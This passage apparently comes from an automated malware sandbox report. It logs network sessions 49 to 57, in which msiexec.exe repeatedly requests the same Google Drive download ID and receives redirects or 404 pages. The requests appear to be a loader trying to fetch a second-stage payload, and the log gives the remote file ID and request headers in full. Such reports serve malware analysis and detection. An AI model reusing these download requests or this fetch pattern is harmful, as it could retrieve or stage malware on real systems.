                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              49 | 192.168.2.8 | 49758 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:47 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:48 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC7PpJygco78OAPaK3hFG88oonTt-210VLZpt1h3UkWp4KJjvNTfvmGNA8z53oNzaRXvJhY0Hm0
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:48 GMT
                                                              Content-Security-Policy: script-src 'nonce-zorbvJy5_Y_vFdXBlwFtvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:48 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TRoQX0WYZIWezObVzOeebA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              50 | 192.168.2.8 | 49759 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:49 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:49 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:49 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-5DtwSFeB2iP5bkjapYTImQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              51 | 192.168.2.8 | 49760 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:50 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:50 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQdH2qI21pfkijE6AqVGEfGxcmAmFSxdvKQQXu42vBc6g9j9DntnMdn8Mrp-HHfcEZ-
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:50 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-Tknkkwpyd_Y7h1Ylp6MlTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:50 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-MGmMK1sdLaHS5GEEF1Ccg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              52 | 192.168.2.8 | 49761 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:51 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:51 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:51 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-g2-y1JaSljKc5Ys-1ZFRBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              53 | 192.168.2.8 | 49762 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:52 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:52 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQkBoNgBV_8BSIdlgQQwj28T0IQz8kJpZcNXuJxeZwDfnGxVwOHA2p494g7uJsAgCeC4ATGDgY
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:52 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-v-MOaZowg8EwsNz76hMwhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:52 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8V74AOGN0uRW_oqbSK9_SQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              54 | 192.168.2.8 | 49763 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:53 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:53 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:53 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-sRWNHZHlMjiDwpDsBTKR0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              55 | 192.168.2.8 | 49764 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:54 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:55 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgRGOSH3aadEM-ryRfiG3x_EOBJRVVXZnjzEOg_I9Kvh6FA3IrU8P40OtZH0J7u6r7LB
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:54 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-5Ak-aDRE4q5gSHY7kuvoGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:55 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-qY858llTXvcX_wX8lUdmw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              56 | 192.168.2.8 | 49765 | 216.58.206.46 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:55 UTC | 418 | OUT | GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:56 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:56 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-54k1n2SEbghZzJhUXujQfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              57 | 192.168.2.8 | 49766 | 172.217.16.193 | 443 | 2160 | C:\Windows\SysWOW64\msiexec.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-10 23:02:56 UTC | 460 | OUT | GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:57 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgS56XdYJC_Cscee8oTNI8OTyX5KIniKl1XzvA8D2ya4JmpD9rbifUt4mw3XTVh1BJCeqtBX6rk
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:57 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-amwoCEfAgwyciBlWv_V4qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
